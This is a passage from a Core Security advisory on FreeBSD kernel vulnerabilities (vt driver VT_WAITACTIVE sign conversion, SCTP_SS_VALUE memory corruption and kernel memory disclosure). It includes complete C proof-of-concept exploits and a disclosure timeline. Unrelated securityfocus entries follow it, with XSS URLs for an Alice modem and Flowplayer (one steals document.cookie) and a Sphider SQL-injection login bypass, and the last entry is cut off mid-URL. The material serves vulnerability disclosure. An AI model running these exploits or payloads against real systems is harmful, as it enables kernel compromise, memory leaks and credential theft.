The vt console driver is prone to a sign conversion error when handling the 'VT_WAITACTIVE' ioctl message, which can be ultimately leveraged by a local unprivileged attacker to make the kernel access an array outside of its boundaries.
The vt console driver provides multiple virtual terminals, which are mapped to the '/dev/ttyv*' device nodes. A user can send messages to the vt driver by opening the '/dev/ttyv*' device node belonging to his virtual terminal and then using the 'ioctl' system call.
The function 'vtterm_ioctl' in 'sys/dev/vt/vt_core.c' handles ioctl messages sent to the vt driver. One of the supported messages is called 'VT_WAITACTIVE':
/-----
static int
vtterm_ioctl(struct terminal *tm, u_long cmd, caddr_t data,
struct thread *td)
{
int error, i, s;
[...]
switch (cmd) {
[...]
case VT_WAITACTIVE:
error = 0;
i = *(unsigned int *)data;
if (i > VT_MAXWINDOWS)
return (EINVAL);
if (i != 0)
vw = vd->vd_windows[i - 1];
[...]
-----/
As shown above, when handling the 'VT_WAITACTIVE' ioctl message, the 'data' input buffer (which is fully controlled by the local user) is casted as '(unsigned int *)' in order to read an 'unsigned int' from the input data; however, the read value is stored in the 'i' variable, which has *signed* type 'int'.
This sign conversion error will make possible for a local attacker to bypass the subsequent boundary check that tries to ensure that 'i' is not greater than 'VT_MAXWINDOWS' before using it as an index to access the 'vd->vd_windows' array. This flaw can be leveraged by a local attacker to make the kernel access the 'vd->vd_windows' array outside of its boundaries.
The following disassembly snippet represents the vulnerable code in the FreeBSD kernel binary ('/boot/kernel/kernel'):
/-----
vtterm_ioctl+1306 loc_C09B2506: ; CODE XREF: vtterm_ioctl+D6Cj
vtterm_ioctl+1306 cmp esi, 20047606h ; case VT_WAITACTIVE:
vtterm_ioctl+130C mov ecx, edx ; ecx = vd->vd_windows
vtterm_ioctl+130E mov eax, ebx
vtterm_ioctl+1310 jnz loc_C09B275B
vtterm_ioctl+1316 mov eax, [eax] ; i = *(unsigned int *)data;
vtterm_ioctl+1318 cmp eax, 0Ch ; if (i > VT_MAXWINDOWS)...
vtterm_ioctl+131B mov edi, 16h
vtterm_ioctl+1320 jg loc_C09B2760 ; *** signed comparison!
vtterm_ioctl+1326 test eax, eax ; if (i != 0)...
vtterm_ioctl+1328 jz short loc_C09B2531
vtterm_ioctl+132A mov eax, [ecx+eax*4-4] ; **** vw = vd->vd_windows[i - 1]; ---> access vd->vd_windows outside of its boundaries
vtterm_ioctl+132E mov [ebp+var_30], eax
-----/
8.2. *FreeBSD SCTP Socket SCTP_SS_VALUE Memory Corruption Vulnerability*
[CVE-2014-8612]
FreeBSD implements the Stream Control Transmission Protocol (SCTP).[4]. A userland application can use the 'getsockopt/setsockopt' system calls in order to manipulate the options associated with an SCTP socket.
The FreeBSD kernel is prone to a memory corruption vulnerability when setting the 'SCTP_SS_VALUE' SCTP socket option via the 'setsockopt' system call. This vulnerability can be leveraged by a local unprivileged attacker to corrupt kernel memory with an arbitrary 16-bit value.
The handling of the 'setsockopt' system call at the SCTP level is performed by the function 'sctp_setopt' [file 'sys/netinet/sctp_userreq.c']:
/-----
static int
sctp_setopt(struct socket *so, int optname, void *optval, size_t optsize,
void *p)
{
[...]
switch (optname) {
[...]
case SCTP_SS_VALUE:
{
struct sctp_stream_value *av;
SCTP_CHECK_AND_CAST(av, optval, struct sctp_stream_value, optsize);
SCTP_FIND_STCB(inp, stcb, av->assoc_id);
if (stcb) {
if (stcb->asoc.ss_functions.sctp_ss_set_value(stcb, &stcb->asoc, &stcb->asoc.strmout[av->stream_id],
av->stream_value) < 0) {
-----/
As shown above, when handling the 'SCTP_SS_VALUE' socket option, the 'optval' option value (which is fully controlled by the local user), is casted to the 'struct sctp_stream_value *' type and stored into the 'av' variable by using the 'SCTP_CHECK_AND_CAST' macro. After that, if the 'sctb' pointer is not 'NULL' (condition that can be achieved by having the SCTP socket in a *connected* state), then the 'stcb->asoc.ss_functions.sctp_ss_set_value' function pointer is called. The third argument for this function is '&stcb->asoc.strmout[av->stream_id]'. As can be seen, the unstrusted 'av->stream_id' value (which is fully controlled by the local attacker) is used as an index within the 'stcb->asoc.strmout' array without properly checking if it's within the bounds of the array.
However, note that the memory address calculated using the untrusted index is not dereferenced yet; just the calculated address is passed as an argument to the function, so there is still no memory access at this point.
'stcb->asoc.ss_functions' has type 'struct sctp_ss_functions', which is a struct defined in the file 'sys/netinet/sctp_structs.h' containing several function pointers. One of its members is 'sctp_ss_set_value', which is the one being called when handling the 'SCTP_SS_VALUE' socket option:
/-----
/*
* RS - Structure to hold function pointers to the functions responsible
* for stream scheduling.
*/
struct sctp_ss_functions {
void (*sctp_ss_init) (struct sctp_tcb *stcb, struct sctp_association *asoc,
int holds_lock);
void (*sctp_ss_clear) (struct sctp_tcb *stcb, struct sctp_association *asoc,
int clear_values, int holds_lock);
void (*sctp_ss_init_stream) (struct sctp_stream_out *strq, struct sctp_stream_out *with_strq);
void (*sctp_ss_add_to_stream) (struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, struct sctp_stream_queue_pending *sp, int holds_lock);
int (*sctp_ss_is_empty) (struct sctp_tcb *stcb, struct sctp_association *asoc);
void (*sctp_ss_remove_from_stream) (struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, struct sctp_stream_queue_pending *sp, int holds_lock);
struct sctp_stream_out *(*sctp_ss_select_stream) (struct sctp_tcb *stcb,
struct sctp_nets *net, struct sctp_association *asoc);
void (*sctp_ss_scheduled) (struct sctp_tcb *stcb, struct sctp_nets *net,
struct sctp_association *asoc, struct sctp_stream_out *strq, int moved_how_much);
void (*sctp_ss_packet_done) (struct sctp_tcb *stcb, struct sctp_nets *net,
struct sctp_association *asoc);
int (*sctp_ss_get_value) (struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, uint16_t * value);
int (*sctp_ss_set_value) (struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, uint16_t value);
};
-----/
The file 'sys/netinet/sctp_ss_functions.c' defines an array called 'sctp_ss_functions'; each element of this array has type 'struct sctp_ss_functions' and defines a set of function pointers suitable for different SCTP socket options:
/-----
struct sctp_ss_functions sctp_ss_functions[] = {
/* SCTP_SS_DEFAULT */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_default_clear,
.sctp_ss_init_stream = sctp_ss_default_init_stream,
.sctp_ss_add_to_stream = sctp_ss_default_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_default_remove,
.sctp_ss_select_stream = sctp_ss_default_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
},
/* SCTP_SS_ROUND_ROBIN */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_default_clear,
.sctp_ss_init_stream = sctp_ss_default_init_stream,
.sctp_ss_add_to_stream = sctp_ss_rr_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_default_remove,
.sctp_ss_select_stream = sctp_ss_default_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
},
/* SCTP_SS_ROUND_ROBIN_PACKET */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_default_clear,
.sctp_ss_init_stream = sctp_ss_default_init_stream,
.sctp_ss_add_to_stream = sctp_ss_rr_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_default_remove,
.sctp_ss_select_stream = sctp_ss_rrp_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_rrp_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
},
/* SCTP_SS_PRIORITY */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_prio_clear,
.sctp_ss_init_stream = sctp_ss_prio_init_stream,
.sctp_ss_add_to_stream = sctp_ss_prio_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_prio_remove,
.sctp_ss_select_stream = sctp_ss_prio_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_prio_get_value,
.sctp_ss_set_value = sctp_ss_prio_set_value
},
/* SCTP_SS_FAIR_BANDWITH */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_fb_clear,
.sctp_ss_init_stream = sctp_ss_fb_init_stream,
.sctp_ss_add_to_stream = sctp_ss_fb_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_fb_remove,
.sctp_ss_select_stream = sctp_ss_fb_select,
.sctp_ss_scheduled = sctp_ss_fb_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
},
/* SCTP_SS_FIRST_COME */
{
.sctp_ss_init = sctp_ss_fcfs_init,
.sctp_ss_clear = sctp_ss_fcfs_clear,
.sctp_ss_init_stream = sctp_ss_fcfs_init_stream,
.sctp_ss_add_to_stream = sctp_ss_fcfs_add,
.sctp_ss_is_empty = sctp_ss_fcfs_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_fcfs_remove,
.sctp_ss_select_stream = sctp_ss_fcfs_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
}
};
-----/
Note that the value for the 'sctp_ss_set_value' field is *almost* always set to 'sctp_ss_default_set_value', which is just a dummy function defined in 'sys/netinet/sctp_ss_functions.c':
/-----
static int
sctp_ss_default_set_value(struct sctp_tcb *stcb SCTP_UNUSED, struct sctp_association *asoc SCTP_UNUSED,
struct sctp_stream_out *strq SCTP_UNUSED, uint16_t value SCTP_UNUSED)
{
/* Nothing to be done here */
return (-1);
}
-----/
The only case in which the 'sctp_ss_set_value' field is set to a different value is in the 4th element of the array, which corresponds to the 'SCTP_SS_PRIORITY' socket option; in that case, the function pointer is set to 'sctp_ss_prio_set_value', which is a function defined in 'sys/netinet/sctp_ss_functions.c':
/-----
static int
sctp_ss_prio_set_value(struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, uint16_t value)
{
if (strq == NULL) {
return (-1);
}
strq->ss_params.prio.priority = value;
sctp_ss_prio_remove(stcb, asoc, strq, NULL, 1);
sctp_ss_prio_add(stcb, asoc, strq, NULL, 1);
return (1);
}
-----/
The 'value' parameter is fully controlled by the attacker, and the actual value of the 'strq' pointer parameter is the address '&stcb->asoc.strmout[av->stream_id]' in which the attacker can set the 'av->stream_id' index beyond the boundaries of the array, so this function will provide a write-what-where memory corruption primitive when doing the 'strq->ss_params.prio.priority = value' assignment. This memory corruption vulnerability allows a local unprivileged attacker to overwrite kernel memory outside of the 'stcb->asoc.strmout' array with an arbitrary 'uint16_t' value.
In order to make use of the 'sctp_ss_prio_set_value' function, the attacker needs to set up the 'stcb->asoc.ss_functions' struct with the function pointers belonging to the 'SCTP_SS_PRIORITY' socket option. This can be done by hitting the following code in the 'sctp_setopt' function; as can be seen, the 'stcb->asoc.ss_functions' struct can be properly set up for the attack by setting an 'SCTP_PLUGGABLE_SS' socket option with an option value of type 'struct sctp_assoc_value' having its 'assoc_value' field set to 'SCTP_SS_PRIORITY' (see the 'stcb->asoc.ss_functions = sctp_ss_functions[av->assoc_value] ' statement):
/-----
case SCTP_PLUGGABLE_SS:
{
struct sctp_assoc_value *av;
SCTP_CHECK_AND_CAST(av, optval, struct sctp_assoc_value, optsize);
/* Checks if av->assoc_value is a valid index within the sctp_ss_functions array */
if ((av->assoc_value != SCTP_SS_DEFAULT) &&
(av->assoc_value != SCTP_SS_ROUND_ROBIN) &&
(av->assoc_value != SCTP_SS_ROUND_ROBIN_PACKET) &&
(av->assoc_value != SCTP_SS_PRIORITY) &&
(av->assoc_value != SCTP_SS_FAIR_BANDWITH) &&
(av->assoc_value != SCTP_SS_FIRST_COME)) {
SCTP_LTRACE_ERR_RET(inp, NULL, NULL, SCTP_FROM_SCTP_USRREQ, EINVAL);
error = EINVAL;
break;
}
SCTP_FIND_STCB(inp, stcb, av->assoc_id);
if (stcb) {
stcb->asoc.ss_functions.sctp_ss_clear(stcb, &stcb->asoc, 1, 1);
/* The function pointers struct is set up here!!! */
stcb->asoc.ss_functions = sctp_ss_functions[av->assoc_value];
stcb->asoc.stream_scheduling_module = av->assoc_value;
stcb->asoc.ss_functions.sctp_ss_init(stcb, &stcb->asoc, 1);
SCTP_TCB_UNLOCK(stcb);
-----/
8.3. *FreeBSD SCTP Socket SCTP_SS_VALUE Kernel Memory Disclosure Vulnerability*
[CVE-2014-8612]
The third vulnerability is closely related to the second one. The FreeBSD kernel is prone to a kernel memory disclosure when reading the value of the 'SCTP_SS_VALUE' SCTP socket option via the 'getsockopt' system call, which allows local unprivileged attackers to read 16-bit values belonging to the kernel memory space.
The handling of the 'getsockopt' system call at the SCTP level is performed by the function 'sctp_getopt' [file 'sys/netinet/sctp_userreq.c']:
/-----
static int
sctp_getopt(struct socket *so, int optname, void *optval, size_t *optsize,
void *p)
{
[...]
switch (optname) {
[...]
case SCTP_SS_VALUE:
{
struct sctp_stream_value *av;
SCTP_CHECK_AND_CAST(av, optval, struct sctp_stream_value, *optsize);
SCTP_FIND_STCB(inp, stcb, av->assoc_id);
if (stcb) {
if (stcb->asoc.ss_functions.sctp_ss_get_value(stcb, &stcb->asoc, &stcb->asoc.strmout[av->stream_id],
&av->stream_value) < 0) {
-----/
When handling the 'SCTP_SS_VALUE' socket option, the 'optval' option value (which is fully controlled by the local attacker), is casted to the 'struct sctp_stream_value *' type and stored into the 'av' variable by using the 'SCTP_CHECK_AND_CAST' macro. After that, if the 'sctb' pointer is not 'NULL' (condition that can be achieved by having the SCTP socket in a *connected* state), the 'stcb->asoc.ss_functions.sctp_ss_get_value' function pointer is called. The third argument for this function is '&stcb->asoc.strmout[av->stream_id]'. As can be seen, the unstrusted 'av->stream_id' value (which is fully controlled by the local attacker) is used as an index within the 'stcb->asoc.strmout' array without properly checking if it's within the bounds of the array.
The default value for the 'sctp_ss_get_value' function pointer is 'sctp_ss_default_get_value', which is just a dummy function defined in 'sys/netinet/sctp_ss_functions.c':
/-----
static int
sctp_ss_default_get_value(struct sctp_tcb *stcb SCTP_UNUSED, struct sctp_association *asoc SCTP_UNUSED,
struct sctp_stream_out *strq SCTP_UNUSED, uint16_t * value SCTP_UNUSED)
{
/* Nothing to be done here */
return (-1);
}
-----/
The only useful possible value for this function pointer is 'sctp_ss_prio_get_value', which belongs to the function pointers of the 'SCTP_SS_PRIORITY' socket option:
/-----
static int
sctp_ss_prio_get_value(struct sctp_tcb *stcb SCTP_UNUSED, struct sctp_association *asoc SCTP_UNUSED,
struct sctp_stream_out *strq, uint16_t * value)
{
if (strq == NULL) {
return (-1);
}
*value = strq->ss_params.prio.priority;
return (1);
}
-----/
The actual value of the 'strq' pointer parameter is the address '&stcb->asoc.strmout[av->stream_id]' in which the attacker can set the 'av->stream_id' index beyond the boundaries of the array, so this function will allow a local unprivileged attacker to read an 'uint16_t' value belonging to the kernel memory outside of the 'stcb->asoc.strmout' array when doing the '*value = strq->ss_params.prio.priority' assignment.
In order to make use of the 'sctp_ss_prio_get_value' function, the attacker needs to set up the 'stcb->asoc.ss_functions' struct with the function pointers belonging to the 'SCTP_SS_PRIORITY' socket option, as it was previously explained for the second vulnerability.
8.4. *Proof of Concept*
The following code is a Proof of Concept for the first vulnerability:
/-----
#include <stdio.h>
#include <sys/consio.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char **argv){
int fd;
printf("** FreeBSD vt Driver VT_WAITACTIVE Sign Conversion Vulnerability PoC **\n");
if (argc < 2){
printf("\nUsage: ./poc_vt </dev/ttyv*>, where ttyv* is your current virtual terminal.\n");
printf("\nExample: ./poc_vt /dev/ttyv1\n\n");
exit(1);
}
fd = open(argv[1], O_RDONLY);
if (fd == -1){
perror("open");
exit(1);
}
/* 0x90919293 is a negative number when it's interpreted as a signed int, thus it will bypass the
* (signed) boundary check that tries to guarantee that this value is not greater than VT_MAXWINDOWS (12).
* This value will be ultimately used as an index to access the vd->vd_windows array.
*/
if (ioctl(fd, VT_WAITACTIVE, (void *) 0x90919293) == -1){
perror("ioctl");
}
close(fd);
return 0;
}
-----/
The following code is a Proof of Concept for the second vulnerability:
/-----
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <netinet/sctp_uio.h>
#include <arpa/inet.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define PORT 4444
#define ADDR "127.0.0.1"
int main(int argc, char *argv[]) {
int fd;
struct sockaddr_in addr;
struct sctp_initmsg init;
struct sctp_stream_value stream_value;
struct sctp_assoc_value assoc_value;
socklen_t opt_len;
printf("** FreeBSD SCTP Socket SCTP_SS_VALUE Memory Corruption Vulnerability PoC **\n");
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)) < 0) {
perror("socket");
goto out;
}
memset(&init, 0, sizeof(init));
init.sinit_num_ostreams = 2048;
if (setsockopt(fd, IPPROTO_SCTP, SCTP_INITMSG, &init, (socklen_t)sizeof(struct sctp_initmsg)) < 0) {
perror("SCTP_INITMSG");
goto out;
}
memset(&addr, 0, sizeof(addr));
#ifdef HAVE_SIN_LEN
addr.sin_len = sizeof(struct sockaddr_in);
#endif
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr(ADDR);
if (connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) {
perror("connect");
goto out;
}
/* Set up the stcb->asoc.ss_functions struct with the function pointers belonging to the SCTP_SS_PRIORITY socket option */
memset(&assoc_value, 0, sizeof(assoc_value));
assoc_value.assoc_value = SCTP_SS_PRIORITY;
assoc_value.assoc_id = SCTP_CURRENT_ASSOC;
if (setsockopt(fd, IPPROTO_SCTP, SCTP_PLUGGABLE_SS, &assoc_value, (socklen_t)sizeof(struct sctp_assoc_value)) < 0){
perror("setting up function pointers");
goto out;
}
memset(&stream_value, 0, sizeof(stream_value));
stream_value.assoc_id = SCTP_CURRENT_ASSOC;
/*
* stream_id will be used as an index into the stcb->asoc.strmout array without performing bounds checking.
* stream_value will be written to the calculated address.
*/
stream_value.stream_id = 0xFFFF;
stream_value.stream_value = 0x4142;
/* Triggering the vulnerability... */
if (setsockopt(fd, IPPROTO_SCTP, SCTP_SS_VALUE, &stream_value, (socklen_t)sizeof(struct sctp_stream_value)) < 0){
perror("triggering the vulnerability");
goto out;
}
out:
if (close(fd) < 0) {
perror("close");
}
return(0);
}
-----/
The following code is a Proof of Concept for the third vulnerability:
/-----
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <netinet/sctp_uio.h>
#include <arpa/inet.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define PORT 4444
#define ADDR "127.0.0.1"
int main(int argc, char *argv[]) {
int fd;
struct sockaddr_in addr;
struct sctp_initmsg init;
struct sctp_stream_value stream_value;
struct sctp_assoc_value assoc_value;
socklen_t opt_len;
printf("** FreeBSD SCTP Socket SCTP_SS_VALUE Kernel Memory Disclosure Vulnerability **\n");
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)) < 0) {
perror("socket");
goto out;
}
memset(&init, 0, sizeof(init));
init.sinit_num_ostreams = 2048;
if (setsockopt(fd, IPPROTO_SCTP, SCTP_INITMSG, &init, (socklen_t)sizeof(struct sctp_initmsg)) < 0) {
perror("SCTP_INITMSG");
goto out;
}
memset(&addr, 0, sizeof(addr));
#ifdef HAVE_SIN_LEN
addr.sin_len = sizeof(struct sockaddr_in);
#endif
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr(ADDR);
if (connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) {
perror("connect");
goto out;
}
/* Set up the stcb->asoc.ss_functions struct with the function pointers belonging to the SCTP_SS_PRIORITY socket option */
memset(&assoc_value, 0, sizeof(assoc_value));
assoc_value.assoc_value = SCTP_SS_PRIORITY;
assoc_value.assoc_id = SCTP_CURRENT_ASSOC;
if (setsockopt(fd, IPPROTO_SCTP, SCTP_PLUGGABLE_SS, &assoc_value, (socklen_t)sizeof(struct sctp_assoc_value)) < 0){
perror("setting up function pointers");
goto out;
}
memset(&stream_value, 0, sizeof(stream_value));
opt_len = sizeof(stream_value);
stream_value.assoc_id = SCTP_CURRENT_ASSOC;
/* stream_id will be used as an index into the stcb->asoc.strmout array without performing bounds checking. */
stream_value.stream_id = 0x400;
/* Triggering the vulnerability... */
if (getsockopt(fd, IPPROTO_SCTP, SCTP_SS_VALUE, &stream_value, &opt_len) < 0){
perror("triggering the vulnerability");
goto out;
}
printf("[*] Value leaked from kernel: 0x%04X\n", stream_value.stream_value);
out:
if (close(fd) < 0) {
perror("close");
}
return(0);
}
-----/
Note that both the second and third PoCs try to connect to a dummy SCTP server listening on localhost on port 4444, since the SCTP socket needs to be in a 'connected' state in order to trigger the vulnerabilities. The following code, based on the example code published here[5], can be used to run a simple SCTP server listening on port 4444:
/-----
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <arpa/inet.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#define BUFFER_SIZE (1<<16)
#define PORT 4444
#define ADDR "127.0.0.1"
int main(int argc, char *argv[]) {
int fd, n, flags;
struct sockaddr_in addr;
socklen_t from_len;
struct sctp_sndrcvinfo sinfo;
char buffer[BUFFER_SIZE];
struct sctp_event_subscribe event;
if ((fd = socket(AF_INET, SOCK_SEQPACKET, IPPROTO_SCTP)) < 0) {
perror("socket");
goto out;
}
memset(&event, 1, sizeof(struct sctp_event_subscribe));
if (setsockopt(fd, IPPROTO_SCTP, SCTP_EVENTS, &event, sizeof(struct sctp_event_subscribe)) < 0) {
perror("setsockopt");
goto out;
}
memset(&addr, 0, sizeof(struct sockaddr_in));
#ifdef HAVE_SIN_LEN
addr.sin_len = sizeof(struct sockaddr_in);
#endif
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr(ADDR);
if (bind(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) {
perror("bind");
goto out;
}
if (listen(fd, 1) < 0) {
perror("listen");
goto out;
}
while (1) {
flags = 0;
memset(&addr, 0, sizeof(struct sockaddr_in));
from_len = (socklen_t)sizeof(struct sockaddr_in);
memset(&sinfo, 0, sizeof(struct sctp_sndrcvinfo));
n = sctp_recvmsg(fd, (void *)buffer, BUFFER_SIZE, (struct sockaddr *)&addr, &from_len, &sinfo, &flags);
if (flags & MSG_NOTIFICATION) {
printf("Notification received.\n");
} else {
printf("Msg of length %d received from %s:%u on stream %d, PPID %d.\n", n, inet_ntoa(addr.sin_addr), ntohs(addr.sin_port),sinfo.sinfo_stream, ntohl(sinfo.sinfo_ppid));
}
}
out:
if (close(fd) < 0) {
perror("close");
}
return (0);
}
-----/
9. *Report Timeline*
. 2015-01-15:
Initial notification sent to FreeBSD. Publication date set to Feb 16, 2015.
. 2015-01-15:
FreeBSD confirms reception of the report and requests the draft version of the advisory. They clarify that they usually aim for Tuesday releases depending on the severity of the problem.
. 2015-01-15:
Core Security sends a draft version of the advisory to the vendor and requests to be informed once they finish reviewing the vulnerabilities.
. 2015-01-26:
Core Security requests a status report regarding their review of the vulnerabilities and the estimated publication date.
. 2015-01-26:
FreeBSD confirms the bugs, but informs us that they'll only publish a security advisory for the SCTP Socket SCTP_SS_VALUE Memory Corruption and Kernel Memory Disclosure vulnerabilities. For the "vt Driver VT_WAITACTIVE Sign Conversion Vulnerability" they will commit a normal change and then release an "Errata Notice" informing the fix. They set the publication date for 27th January, 2015.
. 2015-01-26:
Core Security informs that understands their position regarding the vt Driver VT_WAITACTIVE Sign Conversion issue, but we will nevertheless publish thew bug in the advisory because we consider it a vulnerability. We accepted their offer of sharing CVE IDs.
. 2015-01-26:
FreeBSD confirms they have available CVE IDs and ask if we want to use IDs from 2014 or 2015.
. 2015-01-27:
FreeBSD informs us that after going through their mail archive they found out that the same issue was reported by Google and that they missed it. They inform us that they will use only one CVE ID for the two SCTP issues because they state they are of the same nature.
. 2015-01-27:
Core Security informs that will assign a the CVE ID CVE-2014-0998 to the vt(4) vulnerability and we requested the date and time they plan to release the fix and advisory.
. 2015-01-27:
FreeBSD informs they will publish the fix and advisory today.
. 2015-01-27:
Advisory CORE-2015-0003 published.
10. *References*
[1] https://www.freebsd.org/releases/10.1R/relnotes.html#new
[2] https://www.freebsd.org/cgi/man.cgi?query=vt&sektion=4
[3] https://wiki.freebsd.org/Newcons
[4] https://www.freebsd.org/cgi/man.cgi?query=sctp&sektion=4
[5] http://www.bsdcan.org/2008/schedule/attachments/44_bsdcan_sctp.pdf
[6] https://security.FreeBSD.org/advisories/FreeBSD-SA-15:02.kmem.asc
11. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright
(c) 2015 Core Security and (c) 2015 CoreLabs,
and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security advisories
team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
source: https://www.securityfocus.com/bid/48642/info
The Alice Modem is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability because the device fails to properly handle user-supplied input.
An attacker may leverage these issues to cause a denial-of-service condition or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successfully exploiting the cross-site scripting issue may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/natAdd?apptype=userdefined&rulename=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=99
http://www.example.com/natAdd?apptype=userdefined&rulename=%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+y=&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=199&protocol1=proto_6&extportstart1=1&extportend1=1&intportstart1=1&intportend1=1&protocol2=proto_6&extportstart2=&extportend2=&intportstart2=&intportend2=&protocol3=proto_6&extportstart3=&extportend3=&intportstart3=&intportend3=
source: https://www.securityfocus.com/bid/48647/info
Sphider is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example input is available:
Username: ' or 0=0 #
Password: ' or 0=0 #
source: https://www.securityfocus.com/bid/48651/info
Flowplayer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Flowplayer 3.2.7 is vulnerable; other versions may also be affected.
http://www.example.com/flowplayer/flowplayer-3.2.7.swf?config={%22clip%22:{%22url%22:%22http://www.example.com/vod/demo.flowplayervod/flowplayer-700.flv%22,%20%22linkUrl%22:%22javascript:alert%28String.fromCharCode%2888,83,83%29%29;alert%28document.cookie%29%22},%22screen%22:{%22height%22:%22100pct%22,%22top%22:0},%22plugins%22:{%22controls%22:{%22timeColor%22:%22#ffffff%22,%22borderRadius%22:%220px%22,%22buttonOffColor%22:%22rgba%28130,130,130,1%29%22,%22bufferGradient%22:%22none%22,%22sliderColor%22:%22#000000%22,%22zIndex%22:1,%22backgroundColor%22:%22rgba%280,%200,%200,%200%29%22,%22scrubberHeightRatio%22:0.6,%22tooltipTextColor%22:%22#ffffff%22,%22volumeSliderGradient%22:%22none%22,%22spacing%22:{%22time%22:6,%22volume%22:8,%22all%22:2},%22sliderGradient%22:%22none%22,%22timeBorderRadius%22:20,%22timeBgHeightRatio%22:0.8,%22volumeSliderHeightRatio%22:0.6,%22progressGradient%22:%22none%22,%22height%22:26,%22volumeColor%22:%22#4599ff%22,%22tooltips%22:{%22marginBottom%22:5,%22buttons%22:false},%22timeSeparator%22:%22%20%22,%22name%22:%22controls